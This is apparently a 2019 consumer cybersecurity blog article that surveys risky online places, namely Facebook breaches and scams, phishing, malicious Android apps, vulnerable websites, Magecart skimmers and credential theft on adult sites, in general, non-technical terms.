A few years back, in 2016, we decided to analyze the most dangerous online places, which were represented not only by suspicious locations but also by legitimate websites and services.
In truth, things haven’t changed for the better since 2016, as we’ve been continuously witnessing some of the biggest and most devastating cyberattacks and data breaches, each surpassing the preceding one.
Where does this “backward evolution” leave us, users? We’re still as dependent on social media and digital services as we were a few years ago, and maybe even a tad more. This dependency on “the online realm” has created a very modern paradox. Despite knowing the cybersecurity risks and privacy pitfalls of, let’s say Facebook, we’re still there, voluntarily agreeing to sharing our personal experiences, photographs, travels, locations.
Mentioning Facebook, the social platform has been through a lot, especially since the GDPR came into motion. A dozen of privacy breaches and scandals later, Facebook is definitely not the dreamland of online socializing anymore, and it has deserved a top spot in 2019’s most dangerous online places.
Ever since the infamous Cambridge Analytica Scandal (for which the tech giant was fined a ₤500,000 in October, 2018), the platform has been treading more carefully. The scandal, together with the passage of GDPR, compelled Facebook to add more options to their privacy settings that give users more choice in how they want their personal data to be collected and used.
Despite these actions, Facebook faced another big security breach in September, when up to 50 million Facebook accounts were exposed due to a vulnerability in the ‘View As’ feature, which gave hackers access to users’ profiles. Unlike the Cambridge Analytica event, this was a vulnerability within Facebook itself – one that allowed malicious actors to directly take over user accounts.
While Facebook admitted its mistake and acted promptly to resolve the issue, its actions were less than transparent.
Rather than directly alerting users about the hack, Facebook simply sent affected users a cryptic message on their news feed that read “Your privacy and security are important to us. We want to let you know about recent action we’ve taken to secure your account.” Unfortunately, the message sounded like the usual we-care-about-your-privacy bunk that Facebook feeds us all the time, our guest blogger Shachar Shamir wrote in a story on
Unfortunately, things with Facebook’s misfortunes don’t end here. Being very popular on a global scale, Facebook continues to be abused by cybercriminals for the purpose of spreading malware and scams. The so-calledFacebook virus represents a series of scams which have been circling on the social network. Users are flooded with fake ads which are usually trying to get them watch a video or visit a suspicious page. Clickbait techniques are usually in place when cyber crooks are attempting to plant malware on users’ machines through Facebook or other widely used social networks.
A security researcher known as Lasq recently published a proof-of-concept code about creating a fully functional Facebook worm. The PoC code is based on a specific security vulnerability residing in the mobile version of the Facebook sharing pop-up. Fortunately, the desktop version of the platform is not affected but that does not make the issue less alarming. According to the researcher, a clickjacking vulnerability exists in the mobile sharing dialogue that can be exploited via iframe elements. It is important to note that the flaw has been abused in real-time attacks by a group of hackers that distributes spam. The group has been posting spam links on the walls of Facebook users, and is yet another example of why Facebook is becoming more dangerous with each day.
Social Media, Altogether
A new study carried out by Bromium and Dr. Mike McGuire says that cybercrime through social media (Facebook, Twitter, LinkedIn, Instagram) is generating at least $3.25 billion in global revenue annually. The report which was published in February is based on three key factors: “how revenues are generated and which revenues are the most lucrative at present; how revenues are being moved around or laundered; and where revenues are spent or converted into other assets or activities”.
The report also pays attention to the range of malicious services offered openly on social networks, such as hacking tools, botnets for hire, cryptocurrency scams. Crimes based on social media have grown significantly, and so has the risk of using them. One in five organizations has been attacked by malware delivered through the means of social media.
Financially-driven motivations represent the most important single driver of both the form and spread of cybercrime, the report notes. However, the “cybercrime as a business” definition is no longer adequate to capture its complexities. Here’s where the so-called “Web of Profit” comes into play – “a hyper-connected range of economic agents, economic relationships and other factors now capable of generating, supporting and maintaining criminal revenues at unprecedented scale“.
In short, social media-enabled cybercrime is generating $3.25 billion annually. As for the number of affected individuals, 1.3 billion social media users have been affected within the past five years. It’s also highly likely that some 50 percent of illegal data trading in 2017-2018 took place due to social media hacks and data breaches.
In 2017, security researchers at Wordfence detected a highly effective and massively spread phishing techniquestealing login credentials for Gmail and other services. All in all, it’s your average phishing scam where the attacker would send an email to a Gmail account. The email may appear to be sent by someone the target knows, and that’s because their account has been hacked. The email may include an attachment of an image. Upon clicking on the image to preview it, a new tab will open up and the user will be prompted to sign in to Gmail again. The location bar shows the following address: accounts.google.com, so even the experienced eye may be misled.
Once the sign-in is completed, the targeted account is compromised. The whole process happens very quickly, and it is either automated or the attackers are on standby, processing the compromised accounts. Once access to an account is obtained, the attacker has full access to all the victim’s emails, and is also granted access to other services accessible via the password reset mechanism. This includes other email accounts, software-as-a-service, etc.
Phishers are constantly improving their tactics. According to recent reports by security vendors, phishing websites are increasingly using security certificates (HTTPS) in their attempt to fool users. A bothersome trend is that the payment sector is subject to phishing scams more than ever before. More specifically, this sector was the most targeted in Q3 2018, followed by SAAS/webmail and financial institutions.
We’ve created a 2019 phishing guide which we regularly update with the most recent phishing scams.
NOTE. All popular 2019 phishing scams are deployed via email messages. Recipients will be sent messages that are disguised as legitimate notifications from a service, program, product or another party, claiming that a certain type of interaction is required. Most of the times the scams are related to account activity, fraud transactions or password reset reminders.
All of these may be legitimate reasons for sending out activity messages and as such can easily be confused with the real notifications. In almost all cases similar sounding domain names and security certificates (self-signed, stolen or hacker-issued) will be implemented in the landing pages to confuse the recipients that they are visiting a safe site. The legitimate design layout, elements and text contents can also be copied from the legitimate sites. So, be extremely careful with any convincingly looking but unexpected email that shows up in your inbox, especially when “urgent activities” are required.
Google Play Store, Third Party App Stores
Third Party App Stores
Some malicious apps are worse than others, and such is the case with a battery optimization that is designed to steal money from users’ PayPal accounts. The app was detected in December, 2018, and it didn’t affect Google Play Store. Nonetheless, security researchers have detected similar apps lurking in the Play Store as well. More specifically, 5 such apps were found in the official store targeting Brazilian users.
As for the battery optimization app that drained PayPal accounts, it was hiding an Android Trojan inside it, and it is the Trojan that has the capabilities to initiate PayPal money transfers without the user‘s knowledge. This is possible due to an automated system which also makes it impossible for the victimized user to stop the unwanted transaction.
During the installation process, the app requests access to the Android Accessibility permission which enables apps to automate screen taps and OS interactions. A very alarming permission, indeed. However, note that the app won’t do anything until the user opens their PayPal. To speed up this activity, the Trojan may trigger notifications to push the user into opening PayPal on their device.
Google Play Store
In January, Trend Micro researchers reported a number ofmalicious beauty camera apps for Android on Google Play Store, some of which downloaded millions of times. The apps could access remote ad configuration servers that could be used for malicious purposes, the researchers said.
The apps were grouped into two categories. Some of them were variations of the same camera app that beautifies photos, and the rest offered photo filters on users’ snapshots. Fortunately, the apps are now removed from Google Play, but this may come a little too late as they were already downloaded by millions of users.
Websites get compromised, and there’s hardly a website that’s a hundred percent secure against attacks. These attacks usually have one thing in common – they are not carried out by highly knowledgeable hackers but mainly by the so-called “script kiddies”, or inexperienced crooks that download automated toolkits and attempt to crack websites with easily exploitable vulnerabilities.
Basically, there are ten types of dangers for websites and web applications that enable various attacks:
- SQL injection
- Broken authentication
- Exposure of sensitive data
- XML external entities
- Broken access control
- Security misconfiguration
- Cross-site scripting (XSS)
- Insecure deserialization
- Using components with known vulnerabilities
- Insufficient logging and monitoring
We have seen thousands of websites fall victims to these attacks. Let’s have a look at a recent example. A stored cross-site scripting (XSS) flaw was recently patched in version 5.2.0 of a popular WordPress plugin called Abandoned Cart Lite For WooCommerce. What was the attack about? Cybercriminals created a cart with fake contact information, which was then abandoned. The applied names and emails were random, but the requests followed the same pattern: the generated first and last name were supplied together as billing_first_name, but the billing_last_name field contained the injected payload. The purpose of these attacks was to drop two backdoors on victims’ systems.WordPress and Wix, among others, were also found to contain serious XSS flaws.
Magento-Based Online Stores
Thanks to the Magecart criminal group, websites running on Magento are constantly in danger. Last year, the respected security researcher Willem de Groot unearthed an extremely successful skimming campaign, at the center of which was the MagentoCore skimmer. Prior to the discovery, the skimmer already infected 7,339 Magento stores, thus becoming the most aggressive campaign of this sort.
Beware that victims of this skimming malware are some multi-million, publicly traded companies. In truth, it is the customers of these companies that have their cards and identities stolen.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months. The group hasn’t finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks”, the researchersaid back then.
Later, the same researcher discovered that the Magecart malware is capable of re-infecting the website even after it’s been cleaned up. The researcher tracked infections similar to Magecart on at least 40,000 domains for the past three years. It appears that during August, September and October last year, his MageReport scanner came across Magecart skimmers on more than 5,400 domains. Some of these infections turned out to be quite persistent, spending up to 12.7 days on infected domains.
As for the re-infections, the reasons are the following:
- The operators of Magecart often drop backdoor on hacked stores and create rogue admin accounts;
- The malware operators use efficient reinfection mechanisms such as database triggers and hidden periodic tasks;
- The operators also use obfuscation techniques to mask their code.
- The operators often use zero-day exploits to hack vulnerable sites.
So, you should definitely pay attention to your online shopping habits, as Magento is perhaps the most popular ecommerce platform at the moment.
We won’t be talking about the general risks of visiting adult websites. Instead we will refer to statistics once again. According to a recent report by Kaspersky Lab, the number of malware strains prowling for login credentials on porn websites has tripled in 2018. The number of advertisements that sell access to hacked accounts on adult websites has doubled.
In 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts.
The most active malware found on adult portals was the so-called Jimmy Trojan. The preferred method of distribution of this malware strain is via email spam, the researchers said.
Pornhub and XNXX were the two adult portals where criminals mostly focused on stealing credentials. In comparison, in previous years login stealing malware was focused on more websites such as Brazzers, Chaturbate, Youporn, X-videos.
Kaspersky researchers also analyzed the top 20 Dark Web marketplaces and found more than 3,000 offers for credentials to porn portals. The researchers also found 29 websites hosting more than 15,000 packages for accounts on various adult portals, which is twice as much as compared to 2017.
Of course, this article doesn’t cover all the risks that the various online locations hide. However, it does highlight the top threat trends of which users should be fully aware. Whatever you do online, do it with caution.